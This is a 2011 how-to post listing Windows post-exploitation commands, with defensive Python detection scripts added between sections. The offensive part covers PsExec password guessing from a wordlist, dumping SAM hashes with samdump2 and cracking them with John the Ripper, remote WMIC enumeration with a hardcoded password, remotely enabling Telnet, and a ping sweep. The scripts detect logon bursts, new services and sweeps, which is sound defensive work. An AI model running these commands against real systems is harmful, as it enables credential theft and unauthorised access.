Sep 25, 2011

Howto: Commands for Information Gathering in Windows Post-Exploitation

If you want to see all of the commands and the results of each one, please go to the Source.
 

Gathering system-related information


C:\>systeminfo 

Running Services


C:\>tasklist /svc 

Installed Services


C:\>sc query state= all

Current environment settings


C:\>set

Find Username


C:\>set | find "USERNAME"

Find Domain


C:\>set | find "USERDOMAIN"
 

Find Current User Information


C:\>net user John 

Find Users with Administrator Privileges in the current machine


C:\>net localgroup Administrators 

Password Guessing with PsExec

Username: Jack, Computer Name: XP-INTRANET, Password List: PassList.txt


C:\DOCUME~1\John>FOR /f %i in (PassList.txt) do @echo %i & @psexec /accepteula \\XP-INTRANET -u Jack -p %i "ipconfig" 2>nul && echo ***************** %i *****************
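From the defender's side, the loop above leaves a distinctive trace on the target: a burst of failed network logons for one account from one client, then a success, then PsExec installing its PSEXESVC service. The following detection sketch is an added example, not code from the original post. It assumes the target's event records have already been exported into a list of dicts and that the target runs a Vista-or-later Windows, where a failed logon is Security event 4625, a successful logon is 4624, and a newly installed service is System event 7045; the records themselves are constructed for this example.

```python
# Added detection example (not from the original post). Event IDs assumed:
# 4625 = failed logon, 4624 = successful logon, 7045 = service installed.
from collections import defaultdict
from datetime import datetime, timedelta


def _ts(s):
    return datetime.strptime(s, "%Y-%m-%d %H:%M:%S")


# Constructed sample records, not captured logs.
SAMPLE_EVENTS = [
    # five wrong passwords for "Jack" from one client in 15 seconds ...
    {"time": "2011-09-25 10:00:00", "event_id": 4625, "user": "Jack", "src": "192.168.168.50"},
    {"time": "2011-09-25 10:00:03", "event_id": 4625, "user": "Jack", "src": "192.168.168.50"},
    {"time": "2011-09-25 10:00:06", "event_id": 4625, "user": "Jack", "src": "192.168.168.50"},
    {"time": "2011-09-25 10:00:09", "event_id": 4625, "user": "Jack", "src": "192.168.168.50"},
    {"time": "2011-09-25 10:00:12", "event_id": 4625, "user": "Jack", "src": "192.168.168.50"},
    # ... then the right one, followed by PsExec installing its service
    {"time": "2011-09-25 10:00:15", "event_id": 4624, "user": "Jack", "src": "192.168.168.50"},
    # 7045 carries no client address; it is tied to the success by time only
    {"time": "2011-09-25 10:00:16", "event_id": 7045, "service": "PSEXESVC"},
    # benign noise: one typo by another user from elsewhere
    {"time": "2011-09-25 10:05:00", "event_id": 4625, "user": "Alice", "src": "192.168.168.77"},
]


def failed_logon_bursts(events, threshold=5, window=timedelta(minutes=2)):
    """Sliding window over 4625 events per (user, source).

    Returns {(user, src): peak failures inside one window} for pairs that
    reach `threshold`.
    """
    per_key = defaultdict(list)
    for e in events:
        if e["event_id"] == 4625:
            per_key[(e["user"], e["src"])].append(_ts(e["time"]))
    hits = {}
    for key, times in per_key.items():
        times.sort()
        start = 0
        for end in range(len(times)):
            while times[end] - times[start] > window:
                start += 1
            count = end - start + 1
            if count >= threshold:
                hits[key] = max(hits.get(key, 0), count)
    return hits


def psexec_after_burst(events, bursts, window=timedelta(minutes=5)):
    """For each burst, look for a 4624 success for the same user and source
    followed within `window` by a 7045 install of PSEXESVC on the host.
    Returns a list of (user, src, failure_count) findings."""
    installs = [_ts(e["time"]) for e in events
                if e["event_id"] == 7045 and e.get("service", "").upper() == "PSEXESVC"]
    findings = []
    for (user, src), count in bursts.items():
        successes = [_ts(e["time"]) for e in events
                     if e["event_id"] == 4624 and e.get("user") == user and e.get("src") == src]
        if any(timedelta(0) <= i - s <= window for s in successes for i in installs):
            findings.append((user, src, count))
    return findings


def run(events=SAMPLE_EVENTS):
    """Run both stages; returns (bursts, findings)."""
    bursts = failed_logon_bursts(events)
    return bursts, psexec_after_burst(events, bursts)


if __name__ == "__main__":
    for user, src, count in run()[1]:
        print(f"{src}: {count} failed logons for {user}, then success and PSEXESVC install")
```

The threshold and window are deliberately low so the sample triggers; on a real host tune them against normal lockout and helpdesk noise, and treat a 7045 for PSEXESVC on any machine where PsExec is not an approved admin tool as worth a look on its own.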


Extract hashes from the SAM and SYSTEM files with samdump2



root@bt:~# samdump2 sam system >hashes.txt

Password cracking with John the Ripper using a wordlist


root@bt:/pentest/passwords/john# ./john --format=nt --wordlist=/root/Dicts/john.txt --rules /root/hashes.txt


Gather cached DNS information


C:\>ipconfig /displaydns


OS Information


C:\>wmic /node: 192.168.168.140 /user:IWAM_NETASPS /password:$ecretP4$$ os get name,servicepackmajorversion 

Installed Software


C:\>wmic /node: 192.168.168.140 /user:IWAM_NETASPS /password:$ecretP4$$ product get name,version

Running Processes


C:\>wmic /node: 192.168.168.140 /user:IWAM_NETASPS /password:$ecretP4$$ process list brief


Local Drives Info


C:\>wmic /node: 192.168.168.140 /user:IWAM_NETASPS /password:$ecretP4$$ logicaldisk get 


Shares Info


C:\>wmic /node: 192.168.168.140 /user:IWAM_NETASPS /password:$ecretP4$$ share list /format:table


Network Info


C:\>wmic /node: 192.168.168.140 /user:IWAM_NETASPS /password:$ecretP4$$ nicconfig get 


List Services Information


C:\>wmic /node: 192.168.168.140 /user:IWAM_NETASPS /password:$ecretP4$$ service get /format:list

Find the state of a specific service


C:\>wmic /node: 192.168.168.140 /user:IWAM_NETASPS /password:$ecretP4$$ service where DisplayName="Telnet" GET 


Change start mode of service to automatically start upon boot


C:\>wmic /node: 192.168.168.140 /user:IWAM_NETASPS /password:$ecretP4$$ service where DisplayName="Telnet" CALL 
 

Starting the Telnet service


C:\>wmic /node: 192.168.168.140 /user:IWAM_NETASPS /password:$ecretP4$$ service where DisplayName="Telnet" CALL
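The same `wmic service get /format:list` output used above for enumeration is also a cheap baseline for the defender: snapshot it periodically and diff, and the Telnet start-mode and state changes just shown, plus the PSEXESVC service that PsExec leaves behind, stand out against the previous snapshot. The parser and diff below are an added example, not code from the original post. The two snapshots are constructed and trimmed to four properties; real output carries many more `Key=Value` lines per service, which the parser simply keeps.

```python
# Added example (not from the original post): parse wmic /format:list output
# and diff two service snapshots. Snapshots below are constructed and trimmed.

def parse_wmic_list(text):
    """wmic /format:list prints one Key=Value line per property and blank
    lines between instances. Returns a list of dicts, one per instance."""
    records, current = [], {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            if current:
                records.append(current)
                current = {}
            continue
        key, sep, value = line.partition("=")
        if sep:
            current[key.strip()] = value.strip()
    if current:
        records.append(current)
    return records


def service_changes(before_text, after_text, fields=("StartMode", "State")):
    """Compare two snapshots keyed by service Name.

    Returns (name, field, old, new) tuples; field is "added" or "removed"
    for services present in only one snapshot.
    """
    before = {r["Name"]: r for r in parse_wmic_list(before_text)}
    after = {r["Name"]: r for r in parse_wmic_list(after_text)}
    changes = []
    for name in sorted(after.keys() - before.keys()):
        changes.append((name, "added", None, None))
    for name in sorted(before.keys() - after.keys()):
        changes.append((name, "removed", None, None))
    for name in sorted(before.keys() & after.keys()):
        for f in fields:
            if before[name].get(f) != after[name].get(f):
                changes.append((name, f, before[name].get(f), after[name].get(f)))
    return changes


# Constructed baseline: Telnet disabled and stopped, as it should be.
BASELINE = """
DisplayName=Print Spooler
Name=Spooler
StartMode=Auto
State=Running


DisplayName=Telnet
Name=TlntSvr
StartMode=Disabled
State=Stopped
"""

# Constructed later snapshot: Telnet set to Auto and started, PsExec service present.
AFTER = """
DisplayName=Print Spooler
Name=Spooler
StartMode=Auto
State=Running


DisplayName=PsExec
Name=PSEXESVC
StartMode=Manual
State=Running


DisplayName=Telnet
Name=TlntSvr
StartMode=Auto
State=Running
"""

if __name__ == "__main__":
    for name, field, old, new in service_changes(BASELINE, AFTER):
        print(f"{name}: {field} {old} -> {new}")
```

Keying on `Name` rather than `DisplayName` matters because the display name is free text that a service can be registered with arbitrarily, while the short name is what `sc` and the registry key use.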

Ping Sweep


C:\>FOR /L %i in (1,1,255) do @ping -n 1 192.168.168.%i | find "Reply"
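A sweep like the one above is easy to spot from a packet-filter log: one source sends ICMP echo requests to many distinct hosts in a short time, which no normal client does. The detector below is an added example, not code from the original post. Its log lines are constructed in a simple `date time action proto src dst` layout rather than any vendor's real format, and the one-minute bucketing is an assumption chosen to keep the logic short.

```python
# Added detection example (not from the original post). Log format below is
# constructed for the example, not a real firewall's.
import re
from collections import defaultdict
from datetime import datetime

LINE_RE = re.compile(
    r"^(\d{4}-\d\d-\d\d \d\d:\d\d:\d\d) (ALLOW|DROP) (ICMP|TCP|UDP) (\S+) (\S+)$"
)

SAMPLE_LOG = "\n".join(
    # one client probing .1 through .30 within 30 seconds, echo requests dropped
    [f"2011-09-25 11:00:{i:02d} DROP ICMP 192.168.168.50 192.168.168.{i}" for i in range(1, 31)]
    + [
        # ordinary traffic: a single ping and a TCP connection to one server
        "2011-09-25 11:00:40 ALLOW ICMP 192.168.168.77 192.168.168.10",
        "2011-09-25 11:00:41 ALLOW TCP 192.168.168.77 192.168.168.10",
        "this line is malformed and is skipped",
    ]
)


def parse_log(text):
    """Yield (minute_bucket, proto, src, dst) per well-formed line."""
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(m.group(1), "%Y-%m-%d %H:%M:%S")
        yield ts.replace(second=0), m.group(3), m.group(4), m.group(5)


def detect_ping_sweep(text, min_hosts=20):
    """Count distinct ICMP destinations per (source, minute).

    Returns {src: highest distinct-destination count in any one minute}
    for sources that reach `min_hosts`.
    """
    seen = defaultdict(set)
    for minute, proto, src, dst in parse_log(text):
        if proto == "ICMP":
            seen[(src, minute)].add(dst)
    hits = {}
    for (src, _minute), dsts in seen.items():
        if len(dsts) >= min_hosts:
            hits[src] = max(hits.get(src, 0), len(dsts))
    return hits


if __name__ == "__main__":
    for src, n in detect_ping_sweep(SAMPLE_LOG).items():
        print(f"{src} pinged {n} distinct hosts within one minute")
```

Fixed one-minute buckets will split a sweep that straddles a minute boundary across two buckets, so a slow sweep can slip under the threshold; a sliding window over sorted timestamps closes that gap at the cost of a few more lines.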
 
Source: http://www.ikuppu.com/2011/09/windows-post-exploitation.html 
